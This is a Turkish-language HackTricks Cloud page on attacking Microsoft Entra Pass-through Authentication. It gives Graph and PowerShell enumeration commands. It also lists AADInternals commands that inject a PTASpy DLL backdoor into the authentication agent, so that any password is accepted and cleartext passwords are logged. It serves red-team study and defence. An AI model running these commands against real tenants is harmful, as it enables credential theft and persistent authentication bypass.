HackTricks CloudAz - PTA - Pass-through Authentication
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.
Temel Bilgiler
Belgelerden: Microsoft Entra geçiş kimlik doğrulaması, kullanıcılarınızın hem yerel hem de bulut tabanlı uygulamalara aynı şifreleri kullanarak giriş yapmalarını sağlar. Bu özellik, kullanıcılarınıza daha iyi bir deneyim sunar - hatırlanacak bir şifre daha az ve IT yardım masası maliyetlerini azaltır çünkü kullanıcılarınızın giriş yapmayı unutma olasılığı daha düşüktür. Kullanıcılar Microsoft Entra ID kullanarak giriş yaptığında, bu özellik kullanıcıların şifrelerini doğrudan yerel Active Directory’nizle doğrular.
PTA’da kimlikler senkronize edilir ancak şifreler PHS’deki gibi senkronize edilmez.
Kimlik doğrulama yerel AD’de doğrulanır ve bulutla iletişim, yerel bir sunucuda çalışan bir kimlik doğrulama ajanı tarafından gerçekleştirilir (bu, yerel DC’de olmak zorunda değildir).
Kimlik Doğrulama Akışı
.png)
- Kullanıcı giriş yapmak için Azure AD’ye yönlendirilir, burada kullanıcı adı ve şifre gönderir.
- Kimlik bilgileri şifrelenir ve Azure AD’de bir kuvvet içine yerleştirilir.
- Yerel kimlik doğrulama ajanı, kuyruktan kimlik bilgilerini toplar ve şifreler. Bu ajana “Geçiş kimlik doğrulama ajanı” veya PTA ajanı denir.
- Ajan, kimlik bilgilerini yerel AD ile doğrular ve yanıtı Azure AD’ye geri gönderir; eğer yanıt olumluysa, kullanıcı girişi tamamlanır.
Warning
Eğer bir saldırgan PTA’yı ele geçirirse, kuyruktaki tüm kimlik bilgilerini (şifrelenmemiş olarak) görebilir.
Ayrıca AzureAD’ye herhangi bir kimlik bilgisini doğrulayabilir (Skeleton key’e benzer bir saldırı).
Sayım
Entra ID’den:
az rest --url 'https://graph.microsoft.com/beta/onPremisesPublishingProfiles/authentication/agentGroups?$expand=agents'
# Example response:
{
"@odata.context": "https://graph.microsoft.com/beta/$metadata#onPremisesPublishingProfiles('authentication')/agentGroups(agents())",
"value": [
{
"agents": [
{
"externalIp": "20.121.45.57",
"id": "4a000eb4-9a02-49e4-b67f-f9b101f8f14c",
"machineName": "ConnectSync.hacktricks-con.azure",
"status": "active",
"supportedPublishingTypes": [
"authentication"
]
}
],
"displayName": "Default group for Pass-through Authentication",
"id": "d372d40f-3f81-4824-8b9e-6028182db58e",
"isDefault": true,
"publishingType": "authentication"
}
]
}
Ajanın yerel sunucuda çalışıp çalışmadığını kontrol edin:
Get-Service -Name "AzureADConnectAuthenticationAgent"
Pivoting
Eğer PTA ajanı çalışan Azure AD Connect sunucusu üzerinde admin erişiminiz varsa, ALL the passwords girilen doğrulamak için bir backdoor eklemek üzere AADInternals modülünü kullanabilirsiniz (böylece tüm şifreler kimlik doğrulama için geçerli olacaktır):
Install-Module AADInternals -RequiredVersion 0.9.3
Import-Module AADInternals
Install-AADIntPTASpy # Install the backdoor, it'll save all the passwords in a file
Get-AADIntPTASpyLog -DecodePasswords # Read the file or use this to read the passwords in clear-text
Remove-AADIntPTASpy # Remove the backdoor
Note
Eğer kurulum başarısız olursa, bu muhtemelen eksik Microsoft Visual C++ 2015 Redistributables nedeniyle olabilir.
Bu arka kapı şunları yapacaktır:
- Gizli bir klasör oluşturur
C:\PTASpy PTASpy.dlldosyasınıC:\PTASpy’ye kopyalarPTASpy.dlldosyasınıAzureADConnectAuthenticationAgentServicesürecine enjekte eder
Note
AzureADConnectAuthenticationAgent servisi yeniden başlatıldığında, PTASpy “boşaltılır” ve yeniden kurulması gerekir.
Caution
Bulutta GA ayrıcalıkları alındıktan sonra, yeni bir PTA ajanı kaydetmek mümkün olup, önceki adımları tekrar ederek herhangi bir şifre ile kimlik doğrulaması yapmak ve ayrıca, şifreleri düz metin olarak almak mümkündür.
Seamless SSO
PTA ile Seamless SSO kullanmak mümkündür, bu da diğer kötüye kullanımlara açıktır. Bunu kontrol edin:
References
- https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta
- https://aadinternals.com/post/on-prem_admin/#pass-through-authentication
Tip
AWS Hacking’i öğrenin ve pratik yapın:
GCP Hacking’i öğrenin ve pratik yapın:
Az Hacking’i öğrenin ve pratik yapın:HackTricks'i Destekleyin
- Abonelik planlarını kontrol edin!
- Katılın 💬 Discord group veya telegram group veya Twitter’da bizi takip edin 🐦 @hacktricks_live.
- PR göndererek hacking tricks paylaşın: HackTricks ve HackTricks Cloud github repos.